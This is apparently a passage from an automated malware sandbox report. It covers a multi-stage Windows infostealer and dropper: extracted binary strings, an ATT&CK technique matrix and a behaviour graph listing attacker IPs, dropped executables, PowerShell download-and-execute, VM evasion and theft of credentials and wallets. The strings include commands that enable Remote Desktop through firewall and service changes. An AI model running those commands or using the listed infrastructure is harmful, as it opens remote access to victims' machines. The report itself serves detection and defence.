IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1634294018.0000000000171000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: net start termservice
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1634294018.0000000000171000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090C1D6 sqlite3_clear_bindings,17_2_6090C1D6
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609254B1 sqlite3_bind_zeroblob,17_2_609254B1
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090F435 sqlite3_bind_parameter_index,17_2_6090F435
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609255D4 sqlite3_bind_text16,17_2_609255D4
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609255FF sqlite3_bind_text,17_2_609255FF
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60925686 sqlite3_bind_int64,17_2_60925686
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609256E5 sqlite3_bind_int,17_2_609256E5
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6092562A sqlite3_bind_blob,17_2_6092562A
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60925655 sqlite3_bind_null,17_2_60925655
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6092570B sqlite3_bind_double,17_2_6092570B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60925778 sqlite3_bind_value,17_2_60925778
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090577D sqlite3_bind_parameter_name,17_2_6090577D
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090576B sqlite3_bind_parameter_count,17_2_6090576B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090EAE5 sqlite3_transfer_bindings,17_2_6090EAE5
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,18_2_006C1204
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_006C1806

                                      Mitre Att&ck Matrix

                                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                      Gather Victim Identity Information1
                                      Scripting                                      		2
                                      Valid Accounts                                      		121
                                      Windows Management Instrumentation                                      		1
                                      Scripting                                      		1
                                      Exploitation for Privilege Escalation                                      		21
                                      Disable or Modify Tools                                      		2
                                      OS Credential Dumping                                      		2
                                      System Time Discovery                                      		1
                                      Remote Desktop Protocol                                      		11
                                      Archive Collected Data                                      		1
                                      Ingress Tool Transfer                                      		Exfiltration Over Other Network Medium1
                                      System Shutdown/Reboot
                                      CredentialsDomainsDefault Accounts31
                                      Native API                                      		1
                                      DLL Side-Loading                                      		1
                                      DLL Side-Loading                                      		11
                                      Deobfuscate/Decode Files or Information                                      		21
                                      Input Capture                                      		1
                                      Account Discovery                                      		Remote Desktop Protocol41
                                      Data from Local System                                      		2
                                      Encrypted Channel                                      		Exfiltration Over BluetoothNetwork Denial of Service
                                      Email AddressesDNS ServerDomain Accounts2
                                      Command and Scripting Interpreter                                      		2
                                      Valid Accounts                                      		2
                                      Valid Accounts                                      		41
                                      Obfuscated Files or Information                                      		Security Account Manager13
                                      File and Directory Discovery                                      		SMB/Windows Admin Shares1
                                      Screen Capture                                      		1
                                      Application Layer Protocol                                      		Automated ExfiltrationData Encrypted for Impact
                                      Employee NamesVirtual Private ServerLocal Accounts11
                                      Scheduled Task/Job                                      		11
                                      Scheduled Task/Job                                      		21
                                      Access Token Manipulation                                      		331
                                      Software Packing                                      		NTDS4510
                                      System Information Discovery                                      		Distributed Component Object Model1
                                      Email Collection                                      		Protocol ImpersonationTraffic DuplicationData Destruction
                                      Gather Victim Network InformationServerCloud Accounts2
                                      PowerShell                                      		11
                                      Registry Run Keys / Startup Folder                                      		212
                                      Process Injection                                      		1
                                      Timestomp                                      		LSA Secrets1291
                                      Security Software Discovery                                      		SSH21
                                      Input Capture                                      		Fallback ChannelsScheduled TransferData Encrypted for Impact
                                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                                      Scheduled Task/Job                                      		1
                                      DLL Side-Loading                                      		Cached Domain Credentials661
                                      Virtualization/Sandbox Evasion                                      		VNC3
                                      Clipboard Data                                      		Multiband CommunicationData Transfer Size LimitsService Stop
                                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                                      Registry Run Keys / Startup Folder                                      		1
                                      File Deletion                                      		DCSync3
                                      Process Discovery                                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                      Masquerading                                      		Proc Filesystem11
                                      Application Window Discovery                                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                                      Valid Accounts                                      		/etc/passwd and /etc/shadow1
                                      System Owner/User Discovery                                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron661
                                      Virtualization/Sandbox Evasion                                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                                      Access Token Manipulation                                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task212
                                      Process Injection                                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                      Mshta                                      		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                                      Behavior Graph

                                      Hide Legend

                                      Legend:

                                      • Process
                                      • Signature
                                      • Created File
                                      • DNS/IP Info
                                      • Is Dropped
                                      • Is Windows Process
                                      • Number of created Registry Values
                                      • Number of created Files
                                      • Visual Basic
                                      • Delphi
                                      • Java
                                      • .Net C# or VB.NET
                                      • C, C++ or other language
                                      • Is malicious
                                      • Internet
                                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1639961 Sample: M6gQuZPvgY.exe Startdate: 16/03/2025 Architecture: WINDOWS Score: 100 168 Found malware configuration 2->168 170 Malicious sample detected (through community Yara rule) 2->170 172 Antivirus detection for URL or domain 2->172 174 30 other signatures 2->174 9 rapes.exe 6 76 2->9         started        14 M6gQuZPvgY.exe 5 2->14         started        16 8e933e9d51.exe 2->16         started        18 4 other processes 2->18 process3 dnsIp4 156 176.113.115.6 SELECTELRU Russian Federation 9->156 158 176.113.115.7 SELECTELRU Russian Federation 9->158 160 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 9->160 118 C:\Users\user\AppData\...\718edcc992.exe, PE32 9->118 dropped 120 C:\Users\user\AppData\...\d101bd5267.exe, PE32 9->120 dropped 122 C:\Users\user\AppData\...\0629403be8.exe, PE32 9->122 dropped 130 15 other malicious files 9->130 dropped 226 Creates multiple autostart registry keys 9->226 228 Hides threads from debuggers 9->228 230 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->230 232 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 9->232 20 amnew.exe 4 9->20         started        24 8e933e9d51.exe 9->24         started        26 m0wsoI3.exe 9->26         started        37 3 other processes 9->37 124 C:\Users\user\AppData\Local\...\rapes.exe, PE32 14->124 dropped 126 C:\Users\user\...\rapes.exe:Zone.Identifier, ASCII 14->126 dropped 234 Detected unpacking (changes PE section rights) 14->234 236 Contains functionality to start a terminal service 14->236 238 Tries to evade debugger and weak emulator (self modifying code) 14->238 248 2 other signatures 14->248 29 rapes.exe 14->29         started        128 C:\Users\user\AppData\Local\...\8kUU4r0rO.hta, HTML 16->128 dropped 240 Creates HTA files 16->240 31 mshta.exe 16->31         started        33 cmd.exe 16->33         started        242 Multi AV Scanner detection for dropped file 18->242 244 Suspicious powershell command line found 18->244 246 Tries to download and execute files (via powershell) 18->246 35 powershell.exe 18->35         started        file5 signatures6 process7 dnsIp8 94 C:\Users\user\AppData\Local\...\futors.exe, PE32 20->94 dropped 192 Multi AV Scanner detection for dropped file 20->192 210 2 other signatures 20->210 39 futors.exe 4 44 20->39         started        96 C:\Users\user\AppData\Local\...\vlsMF3EOY.hta, HTML 24->96 dropped 212 3 other signatures 24->212 44 mshta.exe 24->44         started        46 cmd.exe 24->46         started        162 188.114.97.3 CLOUDFLARENETUS European Union 26->162 98 C:\ProgramData\vcruntime140.dll, PE32 26->98 dropped 100 C:\ProgramData\softokn3.dll, PE32 26->100 dropped 102 C:\ProgramData\nss3.dll, PE32 26->102 dropped 106 5 other malicious files 26->106 dropped 194 Detected unpacking (creates a PE file in dynamic memory) 26->194 196 Found evasive API chain (may stop execution after checking mutex) 26->196 214 6 other signatures 26->214 48 cmd.exe 26->48         started        198 Detected unpacking (changes PE section rights) 29->198 216 5 other signatures 29->216 200 Suspicious powershell command line found 31->200 202 Tries to download and execute files (via powershell) 31->202 50 powershell.exe 31->50         started        56 2 other processes 33->56 52 conhost.exe 35->52         started        164 172.67.172.37 CLOUDFLARENETUS United States 37->164 166 23.197.127.21 AKAMAI-ASN1EU United States 37->166 104 C:\Temp\J9hHfTRUK.hta, HTML 37->104 dropped 204 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->204 206 Query firmware table information (likely to detect VMs) 37->206 208 Tries to detect sandboxes and other dynamic analysis tools (window names) 37->208 54 mshta.exe 37->54         started        58 6 other processes 37->58 file9 signatures10 process11 dnsIp12 150 185.215.113.209 WHOLESALECONNECTIONSNL Portugal 39->150 152 77.90.153.244 RAPIDNET-DEHaunstetterStr19DE Germany 39->152 154 3 other IPs or domains 39->154 108 C:\Users\user\AppData\Local\...\mrwipre12.exe, PE32+ 39->108 dropped 110 C:\Users\user\AppData\Local\...\crypted.exe, PE32 39->110 dropped 112 C:\Users\user\AppData\Local\...\crypted.exe, PE32+ 39->112 dropped 116 11 other malicious files 39->116 dropped 218 Contains functionality to start a terminal service 39->218 60 trano1221.exe 39->60         started        64 cronikxqqq.exe 39->64         started        220 Suspicious powershell command line found 44->220 222 Tries to download and execute files (via powershell) 44->222 66 powershell.exe 44->66         started        224 Uses schtasks.exe or at.exe to add and modify task schedules 46->224 68 conhost.exe 46->68         started        70 schtasks.exe 46->70         started        74 2 other processes 48->74 114 TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE, PE32 50->114 dropped 76 2 other processes 50->76 72 powershell.exe 54->72         started        78 3 other processes 58->78 file13 signatures14 process15 file16 132 C:\Users\...\backend_c.cp311-win_amd64.pyd, PE32+ 60->132 dropped 134 C:\Users\user\...\_cffi.cp311-win_amd64.pyd, PE32+ 60->134 dropped 136 C:\Users\user\AppData\...\win32trace.pyd, PE32+ 60->136 dropped 142 80 other malicious files 60->142 dropped 250 Multi AV Scanner detection for dropped file 60->250 80 trano1221.exe 60->80         started        252 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 64->252 254 Injects a PE file into a foreign processes 64->254 83 cronikxqqq.exe 64->83         started        86 WerFault.exe 64->86         started        138 TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, PE32 66->138 dropped 256 Powershell drops PE file 66->256 88 TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE 66->88         started        90 conhost.exe 66->90         started        140 C:\Users\...\483d2fa8a0d53818306efeb32d3.exe, PE32 72->140 dropped 92 conhost.exe 72->92         started        signatures17 process18 dnsIp19 144 149.154.167.220 TELEGRAMRU United Kingdom 80->144 146 104.21.69.194 CLOUDFLARENETUS United States 83->146 176 Query firmware table information (likely to detect VMs) 83->176 178 Tries to harvest and steal ftp login credentials 83->178 180 Tries to harvest and steal browser information (history, passwords, etc) 83->180 182 Tries to steal Crypto Currency Wallets 83->182 148 40.69.147.202 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 86->148 184 Multi AV Scanner detection for dropped file 88->184 186 Detected unpacking (changes PE section rights) 88->186 188 Contains functionality to start a terminal service 88->188 190 4 other signatures 88->190 signatures20

                                      Screenshots

                                      Thumbnails

                                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.